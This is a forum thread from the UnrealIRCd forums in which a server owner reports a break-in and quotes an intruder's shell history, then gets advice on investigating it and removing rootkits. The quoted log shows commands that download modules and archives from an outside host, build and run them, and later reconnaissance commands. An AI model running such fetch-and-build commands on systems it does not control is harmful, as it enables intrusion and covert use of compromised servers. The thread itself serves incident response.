UnrealIRCd Forums

Hi,

I need help about this topic. Hope anybody can tell me something!

I noticed this morning that my root password has changed. After recovering it, I saw a new user in my server called "c". This is what i found in bash_history of that user:

cd /tmp
wget http://www.unrealircd.com/downloads/Unr ... 8.1.tar.gz
tar -zxvf Unreal3.2.8.1.tar.gz
ls
rm -fr Unreal3.2.8.1.tar.gz
cd Unreal3.2
./Config
make
cd src/modules
wget http://unknown.me.uk/hideserver.c
wget http://unknown.me.uk/hideserver.so
cd ..
cd ..
make custommodule MODULEFILE=hideserver
wget http://unknown.me.uk/ircd.motd
wget http://unknown.me.uk/antirandom.tar.gz
tar zxvf antirandom.tar.gz
pwd
cd AntiRandom-1.1
./build
cd ..
./unreal start
exit

Does anyone know what this is?

I found nothing in bash_history of the root user. I suppose he deleted it.


Thanks !!!

sounds hacked to me.

You can do last c as root and see when and from what IP they connected from. Please bear in mind that if you were hacked, the hacker would be stupid if he didn't bounce to your box and the IP is most likely not his/her real one but you'll have an idea of when it happened.

No doubt. It was hacked.

He reconnected about one hour ago, this is what he tried:

w
lastlog
suid
id
uname 0a
uname -a
lastlog
cd /tmp
ls
cd .,
ls -a
exit

I had deleted his changes at /tmp before, so he exited. I have just changed password of "c".

Now I have to try to recover system status and delete the rootkits that he installed to get the password (need help for that). I posted this in another forum (Spanish): http://www.espaciolinux.com/foros/post2 ... ml#p238645 I will translate it here later.

Ahp, His IP:
c pts/0 173-203-192-173. Fri Sep 10 15:26 - 15:27 (00:00)


Thanks a lot!!

I suggest rootkit hunter found at http://www.rootkit.nl/